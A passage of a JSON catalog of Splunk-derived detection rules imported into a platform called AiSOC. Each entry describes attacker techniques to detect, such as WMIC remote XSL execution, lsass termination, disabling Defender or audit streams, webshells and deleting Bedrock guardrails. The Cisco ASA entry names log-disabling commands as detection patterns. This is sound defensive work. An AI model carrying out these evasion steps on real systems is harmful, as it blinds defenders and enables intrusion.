The impact could be severe if vulnerabilities remain unpatched, potentially leading to code execution, data theft, or other compromises through the software supply chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-dependabot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "787dd1c1-eb3a-4a31-8e8c-2ad24b214bc8", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_dependabot.yml" } }, { "id": "splunk-security-content-787e9dd0-4328-11ec-a029-acde48001122", "type": "detection", "name": "WMIC XSL Execution via URL", "description": "The following analytic detects `wmic.exe` loading a remote XSL script\nvia a URL. This detection leverages Endpoint Detection and Response (EDR) data,\nfocusing on command-line executions that include HTTP/HTTPS URLs and the /FORMAT\nswitch. 
This activity is significant as it indicates a potential application control\nbypass, allowing adversaries to execute JScript or VBScript within an XSL file.\nIf confirmed malicious, this technique can enable attackers to execute arbitrary\ncode, escalate privileges, or maintain persistence using a trusted Windows tool,\nposing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1220" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmic-xsl-execution-via-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "787e9dd0-4328-11ec-a029-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmic_xsl_execution_via_url.yml" } }, { "id": "splunk-security-content-78e678d2-bf64-4fe6-aa52-2f7b11dddee7", "type": "detection", "name": "Windows Detect Network Scanner Behavior", "description": "The following analytic detects when an application is used to connect a large number of unique ports/targets within a short time frame. Network enumeration may be used by adversaries as a method of discovery, lateral movement, or remote execution. 
This analytic may require significant tuning depending on the organization and the applications being actively used; it is highly recommended to pre-populate the filter macro prior to activation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595.001", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-detect-network-scanner-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "78e678d2-bf64-4fe6-aa52-2f7b11dddee7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_detect_network_scanner_behavior.yml" } }, { "id": "splunk-security-content-78f7487d-42ce-4f7f-8685-2159b25fb477", "type": "detection", "name": "Linux Octave Privilege Escalation", "description": "The following analytic detects the execution of GNU Octave with elevated privileges, specifically when it runs system commands via sudo. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line arguments that include \"octave-cli,\" \"--eval,\" \"system,\" and \"sudo.\" This activity is significant because it indicates a potential privilege escalation attempt, allowing a user to execute commands as root. 
If confirmed malicious, this could lead to full system compromise, enabling an attacker to gain root access and execute arbitrary commands, severely impacting system security and integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-octave-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "78f7487d-42ce-4f7f-8685-2159b25fb477", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_octave_privilege_escalation.yml" } }, { "id": "splunk-security-content-791b727c-deec-4fbe-a732-756131b3c5a1", "type": "detection", "name": "3CX Supply Chain Attack Network Indicators", "description": "The following analytic identifies DNS queries to domains associated with the 3CX supply chain attack. It leverages the Network_Resolution datamodel to detect these suspicious domain indicators. This activity is significant because it can indicate a potential compromise stemming from the 3CX supply chain attack, which is known for distributing malicious software through trusted updates. 
If confirmed malicious, this activity could allow attackers to establish a foothold in the network, exfiltrate sensitive data, or further propagate malware, leading to extensive damage and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1195.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/3cx-supply-chain-attack-network-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "791b727c-deec-4fbe-a732-756131b3c5a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/3cx_supply_chain_attack_network_indicators.yml" } }, { "id": "splunk-security-content-79439cae-9200-11eb-a4d3-acde48001122", "type": "detection", "name": "Disable Windows Behavior Monitoring", "description": "The following analytic identifies modifications in the registry to disable Windows Defender's real-time behavior monitoring. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to registry paths associated with Windows Defender settings. This activity is significant because disabling real-time protection is a common tactic used by malware such as RATs, bots, or Trojans to evade detection. 
If confirmed malicious, this action could allow an attacker to execute code, escalate privileges, or persist in the environment without being detected by antivirus software.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-windows-behavior-monitoring.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "79439cae-9200-11eb-a4d3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_windows_behavior_monitoring.yml" } }, { "id": "splunk-security-content-799b606e-da81-11eb-93f8-acde48001122", "type": "detection", "name": "Spoolsv Suspicious Process Access", "description": "The following analytic detects suspicious process access by spoolsv.exe, potentially indicating exploitation of the PrintNightmare vulnerability (CVE-2021-34527). It leverages Sysmon EventCode 10 to identify when spoolsv.exe accesses critical system files or processes like rundll32.exe with elevated privileges. This activity is significant as it may signal an attempt to gain unauthorized privilege escalation on a vulnerable machine. 
If confirmed malicious, an attacker could achieve elevated privileges, leading to further system compromise, persistent access, or unauthorized control over the affected environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/spoolsv-suspicious-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "799b606e-da81-11eb-93f8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/spoolsv_suspicious_process_access.yml" } }, { "id": "splunk-security-content-79c7d1fc-64c7-91be-a616-ccda752efe81", "type": "detection", "name": "Windows DLL Search Order Hijacking Hunt with Sysmon", "description": "The following analytic identifies potential DLL search order hijacking or DLL sideloading by detecting known Windows libraries loaded from non-standard directories. It leverages Sysmon EventCode 7 to monitor DLL loads and cross-references them with a lookup of known hijackable libraries. This activity is significant as it may indicate an attempt to execute malicious code by exploiting DLL search order vulnerabilities. 
If confirmed malicious, this could allow attackers to gain code execution, escalate privileges, or maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-dll-search-order-hijacking-hunt-with-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "79c7d1fc-64c7-91be-a616-ccda752efe81", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_dll_search_order_hijacking_hunt_with_sysmon.yml" } }, { "id": "splunk-security-content-7a0dda67-4cc7-4113-b3bd-b3f1489a98bf", "type": "detection", "name": "Windows SharePoint Spinstall0 Webshell File Creation", "description": "This detection identifies the creation or modification of the \"spinstall0.aspx\" webshell file in Microsoft SharePoint directories. This file is a known indicator of compromise associated with the exploitation of CVE-2025-53770 (ToolShell vulnerability). 
Attackers exploit the vulnerability to drop webshells that provide persistent access to compromised SharePoint servers, allowing them to execute arbitrary commands, access sensitive data, and move laterally within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sharepoint-spinstall0-webshell-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7a0dda67-4cc7-4113-b3bd-b3f1489a98bf", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sharepoint_spinstall0_webshell_file_creation.yml" } }, { "id": "splunk-security-content-7a5e3d62-f743-11ee-9f6e-acde48001122", "type": "detection", "name": "AWS Bedrock Delete GuardRails", "description": "The following analytic identifies attempts to delete AWS Bedrock GuardRails, which are security controls designed to prevent harmful, biased, or inappropriate AI outputs. It leverages AWS CloudTrail logs to detect when a user or service calls the DeleteGuardrail API. This activity is significant as it may indicate an adversary attempting to remove safety guardrails after compromising credentials, potentially to enable harmful or malicious model outputs. Removing guardrails could allow attackers to extract sensitive information, generate offensive content, or bypass security controls designed to prevent prompt injection and other AI-specific attacks. 
If confirmed malicious, this could represent a deliberate attempt to manipulate model behavior for harmful purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-delete-guardrails.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7a5e3d62-f743-11ee-9f6e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_delete_guardrails.yml" } }, { "id": "splunk-security-content-7a85eb24-72da-11ec-ac76-acde48001122", "type": "detection", "name": "Linux Possible Access Or Modification Of sshd Config File", "description": "The following analytic detects suspicious access or modification of the sshd_config file on Linux systems. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving processes like \"cat,\" \"nano,\" \"vim,\" and \"vi\" accessing the sshd_config file. This activity is significant because unauthorized changes to sshd_config can allow threat actors to redirect port connections or use unauthorized keys, potentially compromising the system. 
If confirmed malicious, this could lead to unauthorized access, privilege escalation, or persistent backdoor access, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-access-or-modification-of-sshd-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7a85eb24-72da-11ec-ac76-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_access_or_modification_of_sshd_config_file.yml" } }, { "id": "splunk-security-content-7ab3c319-a4e7-4211-9e8c-40a049d0dba6", "type": "detection", "name": "Windows Terminating Lsass Process", "description": "The following analytic detects a suspicious process attempting to terminate the Lsass.exe process. It leverages Sysmon EventCode 10 logs to identify processes granted PROCESS_TERMINATE access to Lsass.exe. This activity is significant because Lsass.exe is a critical process responsible for enforcing security policies and handling user credentials. 
If confirmed malicious, this behavior could indicate an attempt to perform credential dumping, privilege escalation, or evasion of security policies, potentially leading to unauthorized access and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-terminating-lsass-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ab3c319-a4e7-4211-9e8c-40a049d0dba6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_terminating_lsass_process.yml" } }, { "id": "splunk-security-content-7ac0fced-9eae-4381-a748-90dcd1aa9393", "type": "detection", "name": "Windows Office Product Dropped Uncommon File", "description": "The following analytic detects Microsoft Office applications dropping or creating executables or scripts on a Windows OS. It leverages process creation and file system events from the Endpoint data model to identify Office applications like Word or Excel generating files with extensions such as \".exe\", \".dll\", or \".ps1\". This behavior is significant as it is often associated with spear-phishing attacks where malicious files are dropped to compromise the host. 
If confirmed malicious, this activity could lead to code execution, privilege escalation, or persistent access, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-dropped-uncommon-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ac0fced-9eae-4381-a748-90dcd1aa9393", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_dropped_uncommon_file.yml" } }, { "id": "splunk-security-content-7add8520-71d5-43aa-b262-ee082b1f0238", "type": "detection", "name": "Linux Medusa Rootkit", "description": "This detection identifies file creation events associated with the installation of the Medusa rootkit, a userland LD_PRELOAD-based rootkit known for deploying shared objects, loader binaries, and configuration files into specific system directories. These files typically facilitate process hiding, credential theft, and backdoor access. 
Monitoring for such file creation patterns enables early detection of rootkit deployment before full compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1014", "T1589.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-medusa-rootkit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7add8520-71d5-43aa-b262-ee082b1f0238", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_medusa_rootkit.yml" } }, { "id": "splunk-security-content-7aec015b-cd69-46c3-85ed-dac152056aa4", "type": "detection", "name": "Windows WinDBG Spawning AutoIt3", "description": "The following analytic identifies instances of the WinDBG process spawning AutoIt3. This behavior is detected by monitoring endpoint telemetry for processes where 'windbg.exe' is the parent process and 'autoit3.exe' or similar is the child process. This activity is significant because AutoIt3 is frequently used by threat actors for scripting malicious automation, potentially indicating an ongoing attack. 
If confirmed malicious, this could allow attackers to automate tasks, execute arbitrary code, and further compromise the system, leading to data exfiltration or additional malware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-windbg-spawning-autoit3.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7aec015b-cd69-46c3-85ed-dac152056aa4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_windbg_spawning_autoit3.yml" } }, { "id": "splunk-security-content-7b4c9f3e-5a88-4b7b-9c4b-94d8e5d67201", "type": "detection", "name": "Cisco ASA - Logging Disabled via CLI", "description": "This analytic detects the disabling of logging functionality on a Cisco ASA device\nthrough CLI commands. Adversaries or malicious insiders may attempt to disable logging\nto evade detection and hide malicious activity. The detection looks for specific ASA\nsyslog message IDs (111010, 111008) associated with command execution,\ncombined with suspicious commands such as `no logging`, `logging disable`,\n`clear logging`, or `no logging host`. 
Disabling logging on a firewall or security device\nis a strong indicator of defense evasion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-logging-disabled-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b4c9f3e-5a88-4b7b-9c4b-94d8e5d67201", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___logging_disabled_via_cli.yml" } }, { "id": "splunk-security-content-7b7c2e92-f0b2-48d2-9c9b-b8de52b6b2ae", "type": "detection", "name": "Cisco Secure Firewall - Veeam CVE-2023-27532 Exploitation Activity", "description": "This analytic detects exploitation activity of CVE-2023-27532 using Cisco Secure Firewall Intrusion Events.\nIt leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to identify cases where Snort signature 61514 (Veeam Backup and Replication credential dump attempt)\nis followed within a 5-minute window by 64795 (Veeam Backup and Replication xp_cmdshell invocation attempt), which detects the use of `xp_cmdshell`, a common post-exploitation technique.\nIf confirmed malicious, this behavior is highly indicative of a successful exploitation of CVE-2023-27532, followed by remote command execution or credential dumping.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210", "T1059.001", "T1003.001" ], "log_source": null, "playbook": null, 
"verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-veeam-cve-2023-27532-exploitation-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b7c2e92-f0b2-48d2-9c9b-b8de52b6b2ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___veeam_cve_2023_27532_exploitation_activity.yml" } }, { "id": "splunk-security-content-7b83f666-900c-11ec-a2d9-acde48001122", "type": "detection", "name": "Windows Raw Access To Master Boot Record Drive", "description": "The following analytic detects suspicious raw access reads to the drive containing the Master Boot Record (MBR). It leverages Sysmon EventCode 9 to identify processes attempting to read or write to the MBR sector, excluding legitimate system processes. This activity is significant because adversaries often target the MBR to wipe, encrypt, or overwrite it as part of their impact payload. 
If confirmed malicious, this could lead to system instability, data loss, or a complete system compromise, severely impacting the organization's operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1561.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-raw-access-to-master-boot-record-drive.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b83f666-900c-11ec-a2d9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_raw_access_to_master_boot_record_drive.yml" } }, { "id": "splunk-security-content-7b87c556-0ca4-47e0-b84c-6cd62a0a3e90", "type": "detection", "name": "Linux Auditd Change File Owner To Root", "description": "The following analytic detects the use of the 'chown' command to change a file owner to 'root' on a Linux system. It leverages Linux Auditd telemetry, specifically monitoring command-line executions and process details. This activity is significant as it may indicate an attempt to escalate privileges by adversaries, malware, or red teamers. 
If confirmed malicious, this action could allow an attacker to gain root-level access, leading to full control over the compromised host and potential persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-change-file-owner-to-root.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7b87c556-0ca4-47e0-b84c-6cd62a0a3e90", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_change_file_owner_to_root.yml" } }, { "id": "splunk-security-content-7bc111cc-7f1b-4be7-99fa-50cf8d2e7564", "type": "detection", "name": "GitHub Enterprise Disable Audit Log Event Stream", "description": "The following analytic detects when a user disables audit log event streaming in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for configuration changes that disable the audit log streaming functionality, which is used to send audit events to security monitoring platforms. This behavior could indicate an attacker attempting to prevent their malicious activities from being logged and detected by disabling the audit trail. For a SOC, identifying the disabling of audit logging is critical as it may be a precursor to other attacks where adversaries want to operate undetected. 
The impact could be severe as organizations lose visibility into user actions, configuration changes, and security events within their GitHub Enterprise environment, potentially allowing attackers to perform malicious activities without detection. This creates a significant blind spot in security monitoring and incident response capabilities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-disable-audit-log-event-stream.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7bc111cc-7f1b-4be7-99fa-50cf8d2e7564", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_disable_audit_log_event_stream.yml" } }, { "id": "splunk-security-content-7bc20606-5f40-11ec-a586-acde48001122", "type": "detection", "name": "Linux Possible Append Command To At Allow Config File", "description": "The following analytic detects suspicious command lines that append user entries to /etc/at.allow or /etc/at.deny files. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions involving these files. This activity is significant because altering these configuration files can allow attackers to schedule tasks with elevated permissions, facilitating persistence on a compromised Linux host. 
If confirmed malicious, this could enable attackers to execute arbitrary code at scheduled intervals, potentially leading to further system compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-possible-append-command-to-at-allow-config-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7bc20606-5f40-11ec-a586-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_possible_append_command_to_at_allow_config_file.yml" } }, { "id": "splunk-security-content-7bec7c5c-2262-4adb-ba56-c8028512bc58", "type": "detection", "name": "Windows SQL Server Startup Procedure", "description": "This detection identifies when a startup procedure is registered or executed in SQL Server. Startup procedures automatically execute when SQL Server starts, making them an attractive persistence mechanism for attackers. 
The detection monitors for suspicious stored procedure names and patterns that may indicate malicious activity, such as attempts to execute operating system commands or gain elevated privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-startup-procedure.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7bec7c5c-2262-4adb-ba56-c8028512bc58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_startup_procedure.yml" } }, { "id": "splunk-security-content-7c025ef0-9e65-4c57-be39-1c13dbb1613e", "type": "detection", "name": "Windows Server Software Component GACUtil Install to GAC", "description": "The following analytic detects the use of GACUtil.exe to add a DLL into the Global Assembly Cache (GAC). It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because adding a DLL to the GAC allows it to be called by any application, potentially enabling widespread code execution. 
If confirmed malicious, this could allow an attacker to execute arbitrary code across the operating system, leading to privilege escalation or persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-server-software-component-gacutil-install-to-gac.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c025ef0-9e65-4c57-be39-1c13dbb1613e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_server_software_component_gacutil_install_to_gac.yml" } }, { "id": "splunk-security-content-7c0348ce-bdf9-45f6-8a57-c18b5976f00a", "type": "detection", "name": "Okta Multi-Factor Authentication Disabled", "description": "The following analytic identifies an attempt to disable multi-factor authentication (MFA) for an Okta user. It leverages OktaIM2 logs to detect when the 'user.mfa.factor.deactivate' command is executed. This activity is significant because disabling MFA can allow an adversary to maintain persistence within the environment using a compromised valid account. 
If confirmed malicious, this action could enable attackers to bypass additional security layers, potentially leading to unauthorized access to sensitive information and prolonged undetected presence in the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c0348ce-bdf9-45f6-8a57-c18b5976f00a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-7c0fa490-12b0-4d0b-b9f5-e101d1e0e06f", "type": "detection", "name": "O365 Cross-Tenant Access Change", "description": "The following analytic identifies when cross-tenant access/synchronization policies are changed in an Azure tenant. Adversaries have been observed altering victim cross-tenant policies as a method of lateral movement or maintaining persistent access to compromised environments. 
